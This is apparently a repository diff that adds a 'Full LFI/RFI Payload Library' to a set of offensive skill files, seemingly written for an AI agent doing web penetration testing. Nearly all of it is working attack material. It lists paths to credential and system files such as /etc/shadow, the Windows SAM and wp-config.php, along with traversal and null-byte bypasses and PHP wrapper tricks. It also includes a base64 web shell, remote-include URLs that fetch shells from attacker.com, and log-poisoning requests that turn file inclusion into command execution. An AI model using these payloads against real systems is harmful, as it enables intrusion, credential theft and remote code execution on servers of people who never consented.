- package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
- package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
- package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
- package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
- package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
- package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
- package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
- package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
- package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
- package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
- package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
- package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
- package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
- package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
- package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
- package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
- package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
- package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
- package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
- package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
- package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
- package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
- package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
|
@@ -0,0 +1,485 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
# Full LFI/RFI Payload Library (300+ payloads)
|
|
4
|
+
|
|
5
|
+
## Basic LFI Payloads
|
|
6
|
+
|
|
7
|
+
### Unix/Linux
|
|
8
|
+
```
|
|
9
|
+
/etc/passwd
|
|
10
|
+
/etc/shadow
|
|
11
|
+
/etc/group
|
|
12
|
+
/etc/hosts
|
|
13
|
+
/etc/hostname
|
|
14
|
+
/etc/resolv.conf
|
|
15
|
+
/etc/passwd.bak
|
|
16
|
+
/etc/shadow.bak
|
|
17
|
+
/etc/passwd~
|
|
18
|
+
/etc/shadow~
|
|
19
|
+
/etc/issue
|
|
20
|
+
/proc/version
|
|
21
|
+
/proc/cmdline
|
|
22
|
+
/proc/self/cmdline
|
|
23
|
+
/proc/self/environ
|
|
24
|
+
/proc/self/status
|
|
25
|
+
/proc/1/cmdline
|
|
26
|
+
/proc/1/environ
|
|
27
|
+
/proc/1/status
|
|
28
|
+
/proc/self/fd/0
|
|
29
|
+
/proc/self/fd/1
|
|
30
|
+
/proc/self/fd/2
|
|
31
|
+
/proc/uptime
|
|
32
|
+
/proc/loadavg
|
|
33
|
+
/proc/meminfo
|
|
34
|
+
/proc/cpuinfo
|
|
35
|
+
/proc/interrupts
|
|
36
|
+
/proc/modules
|
|
37
|
+
/proc/mounts
|
|
38
|
+
/proc/partitions
|
|
39
|
+
/proc/filesystems
|
|
40
|
+
/proc/swaps
|
|
41
|
+
/proc/kallsyms
|
|
42
|
+
/proc/ioports
|
|
43
|
+
/proc/dma
|
|
44
|
+
/proc/bus/input/devices
|
|
45
|
+
/proc/bus/usb/devices
|
|
46
|
+
/proc/net/arp
|
|
47
|
+
/proc/net/tcp
|
|
48
|
+
/proc/net/udp
|
|
49
|
+
/proc/net/unix
|
|
50
|
+
/proc/net/sockstat
|
|
51
|
+
/proc/net/snmp
|
|
52
|
+
/proc/sys/kernel/version
|
|
53
|
+
/proc/sys/kernel/hostname
|
|
54
|
+
/proc/sys/vm/overcommit_memory
|
|
55
|
+
/proc/sys/vm/swappiness
|
|
56
|
+
/proc/1/croot
|
|
57
|
+
/proc/1/ns/mnt
|
|
58
|
+
/proc/1/ns/pid
|
|
59
|
+
/proc/1/ns/uts
|
|
60
|
+
/proc/1/cgroup
|
|
61
|
+
/proc/1/environ
|
|
62
|
+
/proc/1/exe
|
|
63
|
+
/proc/1/root
|
|
64
|
+
/proc/self/loginuid
|
|
65
|
+
/proc/self/wchan
|
|
66
|
+
/proc/2/cmdline
|
|
67
|
+
/proc/2/environ
|
|
68
|
+
/proc/2/status
|
|
69
|
+
```
|
|
70
|
+
|
|
71
|
+
### Windows
|
|
72
|
+
```
|
|
73
|
+
C:\Windows\System32\config\SAM
|
|
74
|
+
C:\Windows\System32\config\SYSTEM
|
|
75
|
+
C:\Windows\System32\config\SECURITY
|
|
76
|
+
C:\Windows\repair\sam
|
|
77
|
+
C:\Windows\repair\system
|
|
78
|
+
C:\Windows\repair\software
|
|
79
|
+
C:\Windows\repair\security
|
|
80
|
+
C:\Windows\win.ini
|
|
81
|
+
C:\Windows\System32\win.ini
|
|
82
|
+
C:\Windows\boot.ini
|
|
83
|
+
C:\boot.ini
|
|
84
|
+
C:\autoexec.bat
|
|
85
|
+
C:\config.sys
|
|
86
|
+
C:\Windows\System32\drivers\etc\hosts
|
|
87
|
+
C:\Windows\System32\drivers\etc\networks
|
|
88
|
+
C:\Windows\System32\drivers\etc\protocol
|
|
89
|
+
C:\Windows\System32\drivers\etc\services
|
|
90
|
+
C:\Users\Public\Documents\*
|
|
91
|
+
C:\ProgramData\Microsoft\Windows\WER\*
|
|
92
|
+
C:\Windows\Logs\*
|
|
93
|
+
C:\Windows\Temp\*
|
|
94
|
+
C:\Windows\Prefetch\*
|
|
95
|
+
```
|
|
96
|
+
|
|
97
|
+
### Common Config Files
|
|
98
|
+
```
|
|
99
|
+
/etc/apache2/apache2.conf
|
|
100
|
+
/etc/apache2/sites-enabled/*
|
|
101
|
+
/etc/apache2/httpd.conf
|
|
102
|
+
/etc/httpd/conf/httpd.conf
|
|
103
|
+
/etc/nginx/nginx.conf
|
|
104
|
+
/etc/nginx/sites-enabled/*
|
|
105
|
+
/etc/mysql/my.cnf
|
|
106
|
+
/etc/mysql/mysql.cnf
|
|
107
|
+
/etc/postgresql/posgresql.conf
|
|
108
|
+
/etc/redis/redis.conf
|
|
109
|
+
/etc/php/*/php.ini
|
|
110
|
+
/etc/php/*/apache2/php.ini
|
|
111
|
+
/etc/php/*/fpm/php.ini
|
|
112
|
+
/etc/php*/php.ini
|
|
113
|
+
/var/www/html/index.php
|
|
114
|
+
/var/www/html/config.php
|
|
115
|
+
/var/www/html/wp-config.php
|
|
116
|
+
/var/www/html/configuration.php
|
|
117
|
+
/var/www/html/application/config/*
|
|
118
|
+
/etc/bind/named.conf
|
|
119
|
+
/etc/exim4/exim.conf
|
|
120
|
+
/etc/proftpd/proftpd.conf
|
|
121
|
+
/etc/vsftpd/vsftpd.conf
|
|
122
|
+
/etc/ssh/sshd_config
|
|
123
|
+
/etc/ssh/ssh_config
|
|
124
|
+
/etc/snmp/snmpd.conf
|
|
125
|
+
/etc/ldap/ldap.conf
|
|
126
|
+
/etc/krb5.conf
|
|
127
|
+
/etc/samba/smb.conf
|
|
128
|
+
/etc/nsswitch.conf
|
|
129
|
+
/etc/rsyslog.conf
|
|
130
|
+
/etc/syslog.conf
|
|
131
|
+
/etc/cron.d/*
|
|
132
|
+
/etc/cron.daily/*
|
|
133
|
+
/etc/cron.hourly/*
|
|
134
|
+
/etc/crontab
|
|
135
|
+
/var/spool/cron/*
|
|
136
|
+
```
|
|
137
|
+
|
|
138
|
+
### Log Files
|
|
139
|
+
```
|
|
140
|
+
/var/log/apache2/access.log
|
|
141
|
+
/var/log/apache2/error.log
|
|
142
|
+
/var/log/apache2/ssl_access.log
|
|
143
|
+
/var/log/apache2/ssl_error.log
|
|
144
|
+
/var/log/httpd/access_log
|
|
145
|
+
/var/log/httpd/error_log
|
|
146
|
+
/var/log/nginx/access.log
|
|
147
|
+
/var/log/nginx/error.log
|
|
148
|
+
/var/log/messages
|
|
149
|
+
/var/log/syslog
|
|
150
|
+
/var/log/auth.log
|
|
151
|
+
/var/log/secure
|
|
152
|
+
/var/log/maillog
|
|
153
|
+
/var/log/cron
|
|
154
|
+
/var/log/dpkg.log
|
|
155
|
+
/var/log/kern.log
|
|
156
|
+
/var/log/user.log
|
|
157
|
+
/var/log/btmp
|
|
158
|
+
/var/log/lastlog
|
|
159
|
+
/var/log/wtmp
|
|
160
|
+
```
|
|
161
|
+
|
|
162
|
+
## LFI Bypass Techniques
|
|
163
|
+
|
|
164
|
+
### Null Byte
|
|
165
|
+
```
|
|
166
|
+
/etc/passwd%00
|
|
167
|
+
/etc/passwd%00.jpg
|
|
168
|
+
/etc/passwd%00.png
|
|
169
|
+
/etc/passwd%00.html
|
|
170
|
+
/etc/passwd%00?
|
|
171
|
+
/etc/passwd%00..
|
|
172
|
+
/etc/passwd%00...
|
|
173
|
+
```
|
|
174
|
+
|
|
175
|
+
### Encoding
|
|
176
|
+
```
|
|
177
|
+
/etc/passwd
|
|
178
|
+
/etc/./passwd
|
|
179
|
+
/etc/../etc/passwd
|
|
180
|
+
/..//..//..//..//etc/passwd
|
|
181
|
+
/etc/passwd/../etc/passwd
|
|
182
|
+
/etc/passwd/../../etc/passwd
|
|
183
|
+
/etc/passwd/../../../etc/passwd
|
|
184
|
+
/etc/passwd/../../../../etc/passwd
|
|
185
|
+
/etc/passwd/../../../../../etc/passwd
|
|
186
|
+
/etc/passwd/../../../../../../etc/passwd
|
|
187
|
+
/etc/passwd/../../../../../../../etc/passwd
|
|
188
|
+
/etc/passwd/../../../../../../../../etc/passwd
|
|
189
|
+
/etc/passwd/....//....//....//etc/passwd
|
|
190
|
+
/etc/passwd/....//....//....//....//etc/passwd
|
|
191
|
+
/etc/passwd/././././etc/passwd
|
|
192
|
+
/etc/passwd/./././././etc/passwd
|
|
193
|
+
/etc/....//....//....//etc/passwd
|
|
194
|
+
/etc/....//....//....//....//etc/passwd
|
|
195
|
+
```
|
|
196
|
+
|
|
197
|
+
### Path Traversal Variations
|
|
198
|
+
```
|
|
199
|
+
....//....//etc/passwd
|
|
200
|
+
....//....//....//etc/passwd
|
|
201
|
+
....//....//....//....//etc/passwd
|
|
202
|
+
....//....//....//....//....//etc/passwd
|
|
203
|
+
....//....//....//....//....//....//etc/passwd
|
|
204
|
+
..;/..;/..;/etc/passwd
|
|
205
|
+
..;/..;/..;/..;/etc/passwd
|
|
206
|
+
..;/..;/..;/..;/..;/etc/passwd
|
|
207
|
+
/etc/passwd/././././././././././././././././etc/passwd
|
|
208
|
+
/etc/passwd/./././././././././././././././etc/passwd
|
|
209
|
+
/etc/passwd/../../../etc/passwd/../../../etc/passwd/../../../etc/passwd
|
|
210
|
+
/etc/passwd/../../etc/passwd/../../etc/passwd/../../etc/passwd
|
|
211
|
+
/etcwd//pass../../../etc/passwd/../../../etc/passwd/../../../etc/passwd
|
|
212
|
+
```
|
|
213
|
+
|
|
214
|
+
### Wrapper Techniques
|
|
215
|
+
```
|
|
216
|
+
php://filter/convert.base64-encode/resource=index.php
|
|
217
|
+
php://filter/convert.base64-encode/resource=config.php
|
|
218
|
+
php://filter/convert.base64-encode/resource=wp-config.php
|
|
219
|
+
php://filter/read=convert.base64-encode/resource=index.php
|
|
220
|
+
php://input
|
|
221
|
+
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
|
|
222
|
+
data://text/plain,<?php system($_GET['cmd']); ?>
|
|
223
|
+
expect://id
|
|
224
|
+
compress.zlib:///etc/passwd
|
|
225
|
+
zip://etc/passwd
|
|
226
|
+
phar://etc/passwd
|
|
227
|
+
```
|
|
228
|
+
|
|
229
|
+
### PHP Wrapper Bypass
|
|
230
|
+
```
|
|
231
|
+
php://filter/convert.base64-encode/resource=index.php
|
|
232
|
+
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
|
|
233
|
+
php://filter/read=convert.base64-encode/resource=index.php
|
|
234
|
+
php://input
|
|
235
|
+
php://input?cmd=ls
|
|
236
|
+
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
|
|
237
|
+
data:text/plain,<?php system($_GET['cmd']);?>
|
|
238
|
+
data:text/plain,<?php phpinfo(); ?>
|
|
239
|
+
expect://id
|
|
240
|
+
expect://ls
|
|
241
|
+
expect://whoami
|
|
242
|
+
```
|
|
243
|
+
|
|
244
|
+
## RFI Payloads
|
|
245
|
+
|
|
246
|
+
### Basic RFI
|
|
247
|
+
```
|
|
248
|
+
http://attacker.com/shell.txt
|
|
249
|
+
http://attacker.com/shell.php
|
|
250
|
+
http://attacker.com/shell.txt?
|
|
251
|
+
http://attacker.com/shell.txt??
|
|
252
|
+
http://attacker.com/shell.txt???
|
|
253
|
+
http://attacker.com/shell.txt#
|
|
254
|
+
http://attacker.com/shell.txt%00
|
|
255
|
+
https://attacker.com/shell.txt
|
|
256
|
+
https://attacker.com/shell.php
|
|
257
|
+
ftp://attacker.com/shell.txt
|
|
258
|
+
```
|
|
259
|
+
|
|
260
|
+
### RFI with Extensions
|
|
261
|
+
```
|
|
262
|
+
http://attacker.com/shell
|
|
263
|
+
http://attacker.com/shell?
|
|
264
|
+
http://attacker.com/shell.txt
|
|
265
|
+
http://attacker.com/shell.php
|
|
266
|
+
http://attacker.com/shell.php3
|
|
267
|
+
http://attacker.com/shell.php4
|
|
268
|
+
http://attacker.com/shell.php5
|
|
269
|
+
http://attacker.com/shell.phtml
|
|
270
|
+
http://attacker.com/shell.inc
|
|
271
|
+
http://attacker.com/shell.jpg
|
|
272
|
+
http://attacker.com/shell.png
|
|
273
|
+
```
|
|
274
|
+
|
|
275
|
+
### RFI Obfuscation
|
|
276
|
+
```
|
|
277
|
+
http://attacker.com/evil.txt?.php
|
|
278
|
+
http://attacker.com/evil.txt?.html
|
|
279
|
+
http://attacker.com/evil.txt%00.php
|
|
280
|
+
http://attacker.com/evil.txt%00.html
|
|
281
|
+
http://attacker.com/evil.txt%00.jpg
|
|
282
|
+
http://attacker.com/evil.txt# .php
|
|
283
|
+
http://attacker.com/evil.txt// .php
|
|
284
|
+
http://attacker.com/evil.txt/ .php
|
|
285
|
+
http://attacker.com/evil.txt?.php?foo=bar
|
|
286
|
+
```
|
|
287
|
+
|
|
288
|
+
### Data URI RFI
|
|
289
|
+
```
|
|
290
|
+
data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
|
|
291
|
+
data:text/plain,<?php system($_GET['cmd']); ?>
|
|
292
|
+
data:text/html,<script>alert(1)</script>
|
|
293
|
+
data:text/html,<script>alert(document.domain)</script>
|
|
294
|
+
```
|
|
295
|
+
|
|
296
|
+
## Log Poisoning
|
|
297
|
+
|
|
298
|
+
### Apache Access Log
|
|
299
|
+
```
|
|
300
|
+
<?php system($_GET['cmd']); ?>
|
|
301
|
+
<?php phpinfo(); ?>
|
|
302
|
+
<?php passthru($_GET['x']); ?>
|
|
303
|
+
<?php exec($_GET['cmd']); ?>
|
|
304
|
+
```
|
|
305
|
+
|
|
306
|
+
### SSH Log
|
|
307
|
+
```
|
|
308
|
+
<?php system($_GET['cmd']); ?>
|
|
309
|
+
```
|
|
310
|
+
|
|
311
|
+
### SMTP Log
|
|
312
|
+
```
|
|
313
|
+
<?php system($_GET['cmd']); ?>
|
|
314
|
+
```
|
|
315
|
+
|
|
316
|
+
## Session File Inclusion
|
|
317
|
+
```
|
|
318
|
+
/tmp/sess_SESSIONID
|
|
319
|
+
/var/lib/php/sessions/sess_SESSIONID
|
|
320
|
+
/var/tmp/sess_SESSIONID
|
|
321
|
+
/tmp/sessions/sess_SESSIONID
|
|
322
|
+
```
|
|
323
|
+
|
|
324
|
+
## /proc-based LFI
|
|
325
|
+
```
|
|
326
|
+
/proc/self/environ
|
|
327
|
+
/proc/self/fd/0
|
|
328
|
+
/proc/self/fd/1
|
|
329
|
+
/proc/self/fd/2
|
|
330
|
+
/proc/self/fd/3
|
|
331
|
+
/proc/self/fd/4
|
|
332
|
+
/proc/self/fd/5
|
|
333
|
+
/proc/self/fd/6
|
|
334
|
+
/proc/self/fd/7
|
|
335
|
+
/proc/self/fd/8
|
|
336
|
+
/proc/self/fd/9
|
|
337
|
+
/proc/self/fd/10
|
|
338
|
+
/proc/self/cmdline
|
|
339
|
+
/proc/self/status
|
|
340
|
+
/proc/self/wchan
|
|
341
|
+
/proc/1/environ
|
|
342
|
+
/proc/1/exe
|
|
343
|
+
/proc/1/root
|
|
344
|
+
/proc/1/cwd
|
|
345
|
+
/proc/*/environ
|
|
346
|
+
/proc/*/cmdline
|
|
347
|
+
/proc/*/exe
|
|
348
|
+
/proc/*/root
|
|
349
|
+
/proc/*/cwd
|
|
350
|
+
/proc/[pid]/fd/*
|
|
351
|
+
```
|
|
352
|
+
|
|
353
|
+
## Special Files
|
|
354
|
+
```
|
|
355
|
+
/dev/stdin
|
|
356
|
+
/dev/stdout
|
|
357
|
+
/dev/stderr
|
|
358
|
+
/dev/null
|
|
359
|
+
/dev/zero
|
|
360
|
+
/dev/full
|
|
361
|
+
/dev/random
|
|
362
|
+
/dev/urandom
|
|
363
|
+
/dev/pts/0
|
|
364
|
+
/dev/pts/1
|
|
365
|
+
```
|
|
366
|
+
|
|
367
|
+
## Container/VM Escape
|
|
368
|
+
```
|
|
369
|
+
/proc/1/cgroup
|
|
370
|
+
/proc/1/root
|
|
371
|
+
/proc/1/exe
|
|
372
|
+
/proc/1/cmdline
|
|
373
|
+
/proc/1/environ
|
|
374
|
+
/proc/[pid]/mountinfo
|
|
375
|
+
/proc/[pid]/cgroup
|
|
376
|
+
/proc/[pid]/ns/*
|
|
377
|
+
/sys/kernel/debug/*
|
|
378
|
+
/sys/fs/cgroup/*
|
|
379
|
+
/proc/mounts
|
|
380
|
+
/proc/1/map_files/*
|
|
381
|
+
```
|
|
382
|
+
|
|
383
|
+
## Known CVEs for LFI
|
|
384
|
+
```
|
|
385
|
+
CVE-2022-34594
|
|
386
|
+
CVE-2021-42013
|
|
387
|
+
CVE-2021-41773
|
|
388
|
+
CVE-2020-8644
|
|
389
|
+
CVE-2019-5418
|
|
390
|
+
CVE-2019-3396
|
|
391
|
+
CVE-2018-12613
|
|
392
|
+
CVE-2018-1000620
|
|
393
|
+
CVE-2017-12615
|
|
394
|
+
CVE-2016-4438
|
|
395
|
+
CVE-2015-8562
|
|
396
|
+
CVE-2015-5538
|
|
397
|
+
CVE-2014-6271
|
|
398
|
+
```
|
|
399
|
+
|
|
400
|
+
## LFI to RCE Techniques
|
|
401
|
+
|
|
402
|
+
### Via /proc/self/environ
|
|
403
|
+
```
|
|
404
|
+
GET /vulnerable.php?page=../../../proc/self/environ HTTP/1.1
|
|
405
|
+
User-Agent: <?php system($_GET['cmd']); ?>
|
|
406
|
+
```
|
|
407
|
+
|
|
408
|
+
### Via Log Poisoning
|
|
409
|
+
```
|
|
410
|
+
GET /vulnerable.php?page=../../../var/log/apache2/access.log HTTP/1.1
|
|
411
|
+
User-Agent: <?php system($_GET['cmd']); ?>
|
|
412
|
+
```
|
|
413
|
+
|
|
414
|
+
### Via SSH Logs
|
|
415
|
+
```
|
|
416
|
+
GET /vulnerable.php?page=../../../var/log/auth.log HTTP/1.1
|
|
417
|
+
User-Agent: <?php system($_GET['cmd']); ?>
|
|
418
|
+
```
|
|
419
|
+
|
|
420
|
+
### Via PHP Session
|
|
421
|
+
```
|
|
422
|
+
GET /vulnerable.php?page=../../../var/lib/php/sessions/sess_PHPSESSID HTTP/1.1
|
|
423
|
+
```
|
|
424
|
+
|
|
425
|
+
## Wrapper Payloads
|
|
426
|
+
```
|
|
427
|
+
php://filter/read=convert.base64-encode/resource=index.php
|
|
428
|
+
php://filter/read=convert.iconv.UTF-8.UTF-16/resource=index.php
|
|
429
|
+
php://filter/string.toupper/resource=index.php
|
|
430
|
+
php://filter/string.rot13/resource=index.php
|
|
431
|
+
php://filter/convert.base64-decode/resource=index.php
|
|
432
|
+
php://input
|
|
433
|
+
php://fd/0
|
|
434
|
+
php://fd/1
|
|
435
|
+
php://fd/2
|
|
436
|
+
expect://id
|
|
437
|
+
expect://ls
|
|
438
|
+
expect://whoami
|
|
439
|
+
compress.zlib://etc/passwd
|
|
440
|
+
compress.bzip2://etc/passwd
|
|
441
|
+
zip://etc/passwd
|
|
442
|
+
phar://etc/passwd
|
|
443
|
+
ogg://etc/passwd
|
|
444
|
+
```
|
|
445
|
+
|
|
446
|
+
## Template Engines
|
|
447
|
+
|
|
448
|
+
### Laravel
|
|
449
|
+
```
|
|
450
|
+
/storage/logs/laravel.log
|
|
451
|
+
/storage/framework/sessions/*
|
|
452
|
+
/storage/framework/views/*
|
|
453
|
+
/bootstrap/cache/*.php
|
|
454
|
+
```
|
|
455
|
+
|
|
456
|
+
### WordPress
|
|
457
|
+
```
|
|
458
|
+
/wp-content/debug.log
|
|
459
|
+
/wp-content/uploads/*
|
|
460
|
+
/wp-config.php
|
|
461
|
+
/wp-content/plugins/*
|
|
462
|
+
/wp-content/themes/*
|
|
463
|
+
```
|
|
464
|
+
|
|
465
|
+
### Django
|
|
466
|
+
```
|
|
467
|
+
/var/log/django.log
|
|
468
|
+
/var/www/html/project/settings.py
|
|
469
|
+
/manage.py
|
|
470
|
+
```
|
|
471
|
+
|
|
472
|
+
### Rails
|
|
473
|
+
```
|
|
474
|
+
/log/production.log
|
|
475
|
+
/log/development.log
|
|
476
|
+
/config/database.yml
|
|
477
|
+
/config/secrets.yml
|
|
478
|
+
```
|
|
479
|
+
|
|
480
|
+
### CodeIgniter
|
|
481
|
+
```
|
|
482
|
+
/application/logs/*
|
|
483
|
+
/application/config/database.php
|
|
484
|
+
/application/config/config.php
|
|
485
|
+
```
|